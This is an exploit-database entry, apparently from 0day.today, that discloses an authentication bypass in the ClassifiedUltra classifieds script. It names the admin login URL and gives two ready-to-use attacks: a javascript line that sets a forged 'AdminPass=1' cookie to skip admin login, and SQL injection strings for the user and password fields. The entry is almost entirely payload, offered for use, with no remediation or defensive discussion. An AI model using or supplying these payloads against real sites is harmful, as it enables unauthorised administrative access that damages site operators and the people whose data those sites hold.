id: 10824
date: 02/10/2010
title: ClassifiedUltra SQL inject / insecure cookie handling vulnerabilities
author: JiKo
cves: 

=====================================================================
ClassifiedUltra SQL inject / insecure cookie handling vulnerabilities
=====================================================================

[~]-----------|01|
    -{Script}
    name :ClassifiedUltra
    link :http://www.ezonescripts.com/productdemos/ClassifiedUltra/Site_Admin/index.php

[~]-----------|02|
    -{3xpl01t}
    javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";
    User:' or ' 1=1--
    Pass:' or ' 1=1--



#  0day.today [2023-03-26]  #